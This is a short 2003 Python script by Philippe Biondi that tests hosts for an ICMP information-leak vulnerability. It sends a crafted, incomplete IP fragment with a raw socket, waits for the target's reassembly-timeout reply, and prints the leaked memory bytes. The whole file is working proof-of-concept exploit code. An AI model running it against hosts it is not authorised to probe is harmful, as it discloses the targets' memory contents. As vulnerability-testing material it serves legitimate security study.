#! /usr/bin/python ############################################################################# ## ## ## icmpleaktest.py --- tester for the ICMP leak vulnerability ## ## ## ## Copyright (C) 2003 Philippe Biondi ## ## ## ## This program is free software; you can redistribute it and/or modify it ## ## under the terms of the GNU General Public License as published by the ## ## Free Software Foundation; either version 2, or (at your option) any ## ## later version. ## ## ## ## This program is distributed in the hope that it will be useful, but ## ## WITHOUT ANY WARRANTY; without even the implied warranty of ## ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ## ## General Public License for more details. ## ## ## ############################################################################# import sys,os,time from socket import * if len(sys.argv) != 2: print "Usage: icmpleaktest.py " sys.exit(1) target = sys.argv[1] ETH_P_IP = 0x800 load = 18*"X" packet = 'E\x00\x00\x1c\x12\x34\x20\x00@\x01\x00\x00\x00\x00\x00\x00' packet += inet_aton(target) packet += '\x08\x00\xf7\xff\x00\x00\x00\x00' packet += load s=socket(AF_INET, SOCK_RAW, IPPROTO_RAW) s.setsockopt(SOL_IP, IP_HDRINCL, 1) t=socket(AF_PACKET, SOCK_RAW, htons(ETH_P_IP)) pid = os.fork() if not pid: i=30 while i >= 0: time.sleep(1) os.write(1,"%3i\r"%i) i -= 1 print "not received ? Maybe you can't emit fragmented packets (ip_conntrack ?)" sys.exit() s.sendto(packet, (target,0)) print "Packet sent. Answer should take 31s. Interrupt with C-c" while 1: p = t.recv(1600)[14:] if ord(p[9]) != IPPROTO_ICMP: continue p = p[(ord(p[0])&0x0f)*4:] if p[:2] != "\x0b\x01": #ip reassembly time exceeded continue p = p[8:] if p[4:6] != "\x12\x34": continue p = p[(ord(p[0])&0x0f)*4+8+len(load):] os.kill(pid,9) print "Got",repr(p) break